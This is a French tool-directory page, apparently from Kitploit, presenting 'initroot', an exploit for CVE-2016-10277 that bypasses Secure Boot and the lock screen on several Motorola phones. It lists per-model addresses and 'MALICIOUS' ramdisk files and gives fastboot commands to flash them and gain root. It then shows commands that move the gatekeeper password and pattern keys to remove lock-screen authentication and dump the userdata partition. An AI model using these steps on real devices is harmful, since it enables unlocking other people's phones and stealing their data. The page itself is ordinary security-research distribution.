Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
initroot — Exploitation de CVE-2016-10277 pour le contournement de Secure Boot et du verrouillage de l'appareil | Kitploit
Outils/GitHubGitHub/leosol/initroot
Sécurité AndroidAuthentification et AutorisationEscalade de PrivilègesExploitationExfiltration de DonnéesSécurité Mobile
GitHubleosol/initroot

initroot

Exploitation de CVE-2016-10277 pour le contournement de Secure Boot et du verrouillage de l'appareil

Voir le dépôt
53il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation de CVE-2016-10277

Plus d'informations sur : https://alephsecurity.com/2017/06/07/initroot-moto/

Si vous souhaitez simplement vérifier si votre appareil est vulnérable, il peut être plus rapide de flasher le ramdisk d'origine (sans aucune modification). Si c'est votre cas, cherchez simplement initroot-*-STOCK*.cpio.gz.

Motorola XT-1033

  • Adresse Scratch : 0x11000000
  • Padding : 64MB
  • Ramdisk de la ROM d'origine avec padding : initroot-xt1033-p64-STOCK.cpio.gz
  • Ramdisk de la ROM d'origine patché et avec padding : initroot-xt1033-p64-MALICIOUS.cpio.gz

Motorola XT-1040

  • Adresse Scratch : 0x11000000
  • Padding : 64MB
  • Ramdisk de la ROM d'origine avec padding : initroot-xt1040-p64-STOCK.cpio.gz
  • Ramdisk de la ROM d'origine patché et avec padding : initroot-xt1040-p64-MALICIOUS.cpio.gz

Motorola XT-1068

  • Adresse Scratch : 0x11000000
  • Padding : 64MB
  • Ramdisk de la ROM d'origine avec padding : initroot-xt1068-p64-STOCK.cpio.gz
  • Ramdisk de la ROM d'origine patché et avec padding : initroot-xt1068-p64-MALICIOUS.cpio.gz

Motorola XT-1069

  • Adresse Scratch : 0x11000000
  • Padding : 64MB
  • Ramdisk de la ROM d'origine avec padding : initroot-xt1069-p64-STOCK.cpio.gz
  • Ramdisk de la ROM d'origine patché et avec padding : initroot-xt1069-p64-MALICIOUS.cpio.gz

Motorola XT-1078

  • Adresse Scratch : 0x11000000
  • Padding : 64MB
  • Ramdisk de la ROM d'origine avec padding : initroot-xt1078-p64-STOCK.cpio.gz
  • Ramdisk de la ROM d'origine patché et avec padding : initroot-xt1078-p64-MALICIOUS.cpio.gz

Motorola XT-1514

  • Adresse Scratch : 0x90000000
  • Padding : 64MB
  • Ramdisk de la ROM d'origine avec padding : initroot-xt1514-p64-STOCK.cpio.gz
  • Ramdisk de la ROM d'origine patché et avec padding : initroot-xt1514-p64-MALICIOUS.cpio.gz

Exécution et vérification de l'accès root :

  • Flasher et résoudre les bootloops :

    root@kitploit:~
    git clone https://github.com/leosol/initroot.git
    cd xt1040 (or any other folder)
    use ./run-malicious.sh, run-stockramfs.sh and solve-bootloop.sh (if you have any bootloop)
    Or use the following commands:
    fastboot flash aleph $FILE_NAME
    fastboot oem config fsg-id "a initrd=SCRATCH+PAD,LENGTH"
    fastboot continue
    #use the following to solve bootloops
    fastboot oem config fsg-id ""
    
  • Vérifier les privilèges root :

    root@kitploit:~
    root@debian-vaio:~/motoramfs/xt1040# adb devices
    List of devices attached
    * daemon not running. starting it now on port 5037 *
    * daemon started successfully *
    T0092020C5	device
    
    root@debian-vaio:~/motoramfs/xt1040# adb shell
    root@peregrine:/ # getenforce
    >Permissive
    
  • Que puis-je faire avec root ?

    root@kitploit:~
    #remove authentication as pointed out by @kraftdenker (tested on xt1068)
    mv /data/system/gatekeeper.password.key /data/system/_gatekeeper.password.key
    mv /data/system/gatekeeper.pattern.key /data/system/_gatekeeper.pattern.key
    
    #dump your data
    adb pull /dev/block/platform/msm_sdcc.1/by-name/userdata
    
    #or make it permanent
    
Télécharger l’outil